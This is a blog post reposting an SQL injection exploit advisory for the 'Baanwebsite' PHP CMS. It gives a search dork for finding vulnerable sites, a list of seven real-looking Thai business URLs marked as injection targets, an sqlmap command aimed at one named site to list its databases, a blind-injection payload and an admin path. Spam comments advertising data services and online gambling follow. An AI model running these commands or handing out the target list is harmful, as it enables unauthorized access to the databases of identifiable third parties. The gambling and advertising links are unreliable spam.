Information Exploit
[+] Exploit Title: Baanwebsite Sql İnjection Vulnerability
[+] Author : Cxsecurity.com and Magelang1337
[+] Dork : inurl:/php.?id= "Powered by บ้านเว็บไซต์"
[+] Tested on : BackBox 5.1, Chrome
On Target :
- http://www.onlinesolution.co.th/news/view.php?id=17[inject]
- http://steelline.co.th/product/view.php?prod_id=78[inject]
- http://www.zhanbua.com/product/view.php?id=122[inject]
- http://www.smartparkthailand.com/activities/view.php?id=9[inject]
- http://steelline.co.th/product/view.php?prod_id=8[inject]
- http://www.nyexpert87.com/products/view.php?id=32[inject]
- http://www.shizconfa.co.th/portfolio/view.php?id=4[inject]
[+] SQLMAP Poc :
sqlmap -u "http://www.onlinesolution.co.th/news/view.php?id=17" --dbs
[+] Poc SQL Injection :
Parameter: id (GET)[+] Poc local Admin : /admin
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9007=9007 AND 'pOJG'='pOJG
Sumber Bugs Exploit : [https://cxsecurity.com/issue/WLB-2018050129]
Video tutorial
good luck.. and hopefully useful...
2 Comments
Nice post....Thanks for sharing the article....
ReplyDeleteWe are providing the best master data services around the world....visit our site for more information....
master data management in sap
mdom
data cleansing tools
Master Data Governance
Data Cleansing Services
data classification tools
Master Data Management Solutions
data transformation service
Material Master Data Management
Master Data Dictionary
trima kasih gan buat info nya yang sangat membantu sekali ^.^
ReplyDeleteReview Agen Judi Online Terpercaya
Judi Togel Online Terlengkap
Bandar Judi Bola Online Teraman
Agen Judi Slot Gaming Online Terbaik
Agen Live Casino Online Menguntungkan
Agen Togel Online Terpercaya
Judi Poker Online Resmi